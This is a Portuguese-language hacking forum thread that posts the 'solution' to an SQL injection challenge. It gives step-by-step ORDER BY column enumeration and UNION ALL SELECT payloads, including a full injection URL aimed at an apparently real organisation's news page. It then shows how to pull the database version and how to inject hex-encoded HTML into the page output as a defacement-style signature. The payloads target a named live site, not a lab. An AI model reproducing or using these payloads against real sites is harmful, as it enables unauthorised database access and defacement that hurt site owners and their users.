Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Resolução do Desafio SQLI

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Resolução do Desafio SQLI

    Eis a resolução para o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....

    Precisamos ver quantas colunas existem no server usando o comando order by.

    *Order by 1,2,3,4,5,6,7,8[Sem erro]
    *Order by 1,2,3,4,5,6,7,8,9[Sem erro]
    *Order by 1,2,3,4,5,6,7,8,9,10[Sem erro]

    Como a imagem abaixo:



    Seguindo:

    *Order by 1,2,3,4,5,6,7,8,9,10,11[Erro !]



    Agora vamos usar o comando union all select para concatenar as tabelas.

    assim >
    Código:
    -691+union+all+select+1,2,3,4,5,6,7,8,9,10--


    Certo, é a tabela três, então vamos ver o versão do banco. assim:
    Código:
    http://faser.org.br/noticias.php?id=-691+union+all+select+1,2,concat(version()),4,5,6,7,8,9,10--
    Através da hackbar vamos encodar nosso html em meio ao SQLI como nas imagens





    E depois de encodado nosso html em Hex irá ficar assim:



    Como vocês viram na imagem acima conseguimos encodar nosso html em hex, porém como vamos adicionar na nossa injeção ?

    assim:

    Código:
    -691+union+all+select+1,2,concat(version(),AQUI VAI O CÓDIGO),4,5,6,7,8,9,10--
    lembrando que para que se interprete como hex ne necessário adicionar a frente o número 0 e a letra x assim > "0x" < e depois o código encodado, ficaria mais ou menos assim.

    Código:
    -691+union+all+select+1,2,concat(version(),0x3c666f6e742d636f6c6f723d22677265656e223e3a204279204372347433723c2f666f6e743e),4,5,6,7,8,9,10--
    Como na imagem abaixo:



    e apenas precisamos pressionar enter para carregar a url e "TARAM":




    Aguardem os próximos desafios minhas crianças '-'

    Att. Cr4t3r

    Ranking:

    1º andreol263
    2º ....
    3º ....

    Espero mais participantes na próxima vez.
    Yes, I am a criminal. My crime is that of curiosity. My crime is
    that of judging people by what they say and think, not what they look like.
    My crime is that of outsmarting you, something that you will never forgive me
    for.

    I am a hacker, and this is my manifesto. You may stop this individual,
    but you can't stop us all... after all, we're all alike.
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Muito Bom, Realmente Tomara que mais gente Participe na Proxima vez..., e nó proximo desafio Crater, mande eles mandarem a Inbox com o codigo na URL no Topico para ficar mais explicativo!
    sigpic


    Patati Patacula, la vem o pato para ver o que Ha!!
    • Top

    Comment

    • Font Size
      #3
      Sim, eu acabei esquecendo, da próxima vez eu faço isso, obrigado.
      Yes, I am a criminal. My crime is that of curiosity. My crime is
      that of judging people by what they say and think, not what they look like.
      My crime is that of outsmarting you, something that you will never forgive me
      for.

      I am a hacker, and this is my manifesto. You may stop this individual,
      but you can't stop us all... after all, we're all alike.
      • Top

      Comment

      Anterior template Avançar
      X
      Working...
      X